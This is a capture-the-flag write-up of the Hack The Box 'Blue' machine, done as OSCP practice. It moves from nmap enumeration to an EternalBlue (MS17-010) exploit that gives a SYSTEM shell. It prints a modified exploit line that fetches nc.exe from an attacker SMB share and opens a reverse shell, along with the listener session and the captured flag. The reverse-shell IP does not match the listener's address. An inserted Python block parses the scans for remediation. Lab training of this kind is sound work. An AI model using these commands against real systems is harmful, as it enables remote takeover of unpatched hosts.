Friday, 5 November 2021

HTB - BLUE

HACK THE BOX - Training for OSCP

10.10.10.40

Windows 


ENUMERATION PHASE

As usual, let's start with a TCP port scan of all 65535 TCP ports, reporting only the open ones (--open). At the same time we run the default enumeration scripts (-sC) with version detection (-sV), disable DNS name resolution (-n), and save the output in normal nmap format (-oN).

alter@kali:~/htb-vip/prep_oscp/blue$ nmap -p- --open -T5 -sC -sV -n 10.10.10.40 -oN blue.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-05 12:11 CET
Connect Scan Timing: About 11.75% done; ETC: 12:13 (0:01:15 remaining)
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 12.14% done; ETC: 12:13 (0:01:12 remaining)
Nmap scan report for 10.10.10.40
Host is up (0.12s latency).
Not shown: 57067 closed ports, 8460 filtered ports
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 7m49s, deviation: 2s, median: 7m48s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-11-05T11:21:37+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-11-05T11:21:34
|_  start_date: 2021-11-05T11:17:45


So, we have an SMB service running on a very old Windows 7 OS, which strongly suggests EternalBlue (MS17-010). We can verify the vulnerability with nmap's smb-vuln scripts.


alter@kali:~/htb-vip/prep_oscp/blue$  nmap --script "smb-vuln*" -p139,445 10.10.10.40 -oN smb.nmap
Starting Nmap 7.80 ( https://nmap.org ) at 2021-11-05 12:16 CET
Nmap scan report for 10.10.10.40
Host is up (0.13s latency).
PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).


So, as we can see, the machine is reported as vulnerable to MS17-010 (CVE-2017-0143), and both scans also show that SMB signing is not required.
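As an added triage example (not part of the original write-up, nor of nmap), the following Python parses the host-script section of the two scans above into one finding per host and lists the defender-side actions it implies; the sample scan text is constructed from the output shown above.

```python
import re

# Constructed sample: host-script lines taken from the two nmap scans above, merged.
SAMPLE_SCAN = """\
Nmap scan report for 10.10.10.40
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

def parse_smb_findings(text):
    hosts, host, script = {}, None, None
    for raw in text.splitlines():
        m = re.match(r"^Nmap scan report for (\S+)", raw)
        if m:
            host = hosts.setdefault(m.group(1), {"smb1_signing": None, "smb2_signing": None, "ms17_010": "not reported", "cves": []})
            continue
        if host is None or not raw.startswith("|"):
            continue
        m = re.match(r"^\|[_ ]([\w-]+):", raw)   # script header: "| name:" or "|_name:"
        if m:
            script = m.group(1)                   # following indented lines belong to it
            continue
        body = raw.lstrip("|_ ").strip()          # drop nmap's output gutter
        if script == "smb-security-mode" and body.startswith("message_signing:"):
            host["smb1_signing"] = body.split(":", 1)[1].strip()
        elif script == "smb2-security-mode" and body.startswith("Message signing"):
            host["smb2_signing"] = body[len("Message signing"):].strip()
        elif script == "smb-vuln-ms17-010":
            if body.startswith("State:"):
                host["ms17_010"] = body.split(":", 1)[1].strip()
            host["cves"].extend(re.findall(r"CVE-\d{4}-\d+", body))
    return hosts

def remediation_actions(f):
    """Defender-side actions implied by one host's finding."""
    actions = []
    if f["ms17_010"] == "VULNERABLE":
        actions.append("apply MS17-010 and disable SMBv1 (" + ", ".join(f["cves"]) + ")")
    if (f["smb1_signing"] or "").startswith("disabled"):
        actions.append("require SMB signing (SMB1 reports it disabled)")
    if "not required" in (f["smb2_signing"] or ""):
        actions.append("require SMB2 signing (enabled but not required)")
    return actions
```

Feed it the saved smb.nmap file (and the first scan's output) to get the same record for every host in a larger sweep.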


FOOTHOLD PHASE

We can use https://github.com/worawit/MS17-010 in order to double-check and exploit EternalBlue.

The project provides a script called checker.py which allows us to check whether the target SMB server is patched and which named pipes are accessible.


root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 checker.py
checker.py <ip>
root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_ACCESS_DENIED
samr: STATUS_ACCESS_DENIED
netlogon: STATUS_ACCESS_DENIED
lsarpc: STATUS_ACCESS_DENIED
browser: STATUS_ACCESS_DENIED


It did not fully work: the target is unpatched, but every pipe returned STATUS_ACCESS_DENIED. Sometimes we need to provide a username to the checker script, so we edit checker.py and set GUEST as the username:

'''
Script for
- check target if MS17-010 is patched or not.
- find accessible named pipe
'''
USERNAME = 'GUEST'
PASSWORD = ''


Let's try again:


root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 checker.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
The target is not patched
=== Testing named pipes ===
spoolss: STATUS_OBJECT_NAME_NOT_FOUND
samr: Ok (64 bit)
netlogon: Ok (Bind context 1 rejected: provider_rejection; abstract_syntax_not_supported (this usually means the interface isn't listening on the given endpoint))
lsarpc: Ok (64 bit)
browser: Ok (64 bit)


And now it worked: we have several accessible pipes (samr, lsarpc and browser).


EXPLOITATION PHASE

In order to exploit the vulnerability we can use the zzz_exploit.py script, which requires the target IP and, optionally, a pipe name:


python zzz_exploit.py
zzz_exploit.py <ip> [pipe_name]


We can edit zzz_exploit.py and add the following line in order to get a reverse shell:


        #smb_send_file(smbConn, sys.argv[0], 'C', '/exploit.py')
        #service_exec(conn, r'cmd /c copy c:\pwned.txt c:\pwned_exec.txt')
        service_exec(conn, r'cmd /c \\10.10.14.18\a\nc.exe -e cmd 10.10.14.11 443')
        # Note: there are many methods to get shell over SMB admin session

The victim is going to connect back to our shared resource "a" running on my Kali box, so it will be able to fetch nc.exe from the share and execute a reverse shell to port 443.


Let's run our smbserver to share nc.exe:

root@kali:/home/alter/oscp/escalar/windows/tools# python2.7 smbserver a .
python2.7: can't open file 'smbserver': [Errno 2] No such file or directory
root@kali:/home/alter/oscp/escalar/windows/tools# smbserver.py a .
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation



Then we run zzz_exploit.py, providing the IP address and the pipe name:

root@kali:/home/alter/oscp/smb/exploits/MS17-010# python2.7 zzz_exploit.py 10.10.10.40 samr
Target OS: Windows 7 Professional 7601 Service Pack 1
Target is 64 bit
Got frag size: 0x10
GROOM_POOL_SIZE: 0x5030
BRIDE_TRANS_SIZE: 0xfa0
CONNECTION: 0xfffffa8001d00360
SESSION: 0xfffff8a001aea060
FLINK: 0xfffff8a009239088
InParam: 0xfffff8a00923315c
MID: 0x2d03
success controlling groom transaction
modify trans1 struct for arbitrary read/write
make this SMB session to be SYSTEM
overwriting session security context
creating file c:\pwned.txt on the target
Opening SVCManager on 10.10.10.40.....
Creating service MAWE.....
Starting service MAWE.....
The NETBIOS connection with the remote host timed out.
Removing service MAWE.....
ServiceExec Error on: 10.10.10.40
nca_s_proto_error
Done


We already had our listener ready to catch the reverse shell (the ServiceExec timeout above is expected, since nc.exe keeps the service process alive):

alter@kali:~/htb-vip/prep_oscp/blue$ sudo rlwrap nc -nlvp 443
[sudo] password for alter: 
listening on [any] 443 ...
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.40] 49159
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

C:\Users\Administrator\Desktop>type root.txt
type root.txt
ff548eb71e920ff6c08843ce9df4e717

C:\Users\Administrator\Desktop>



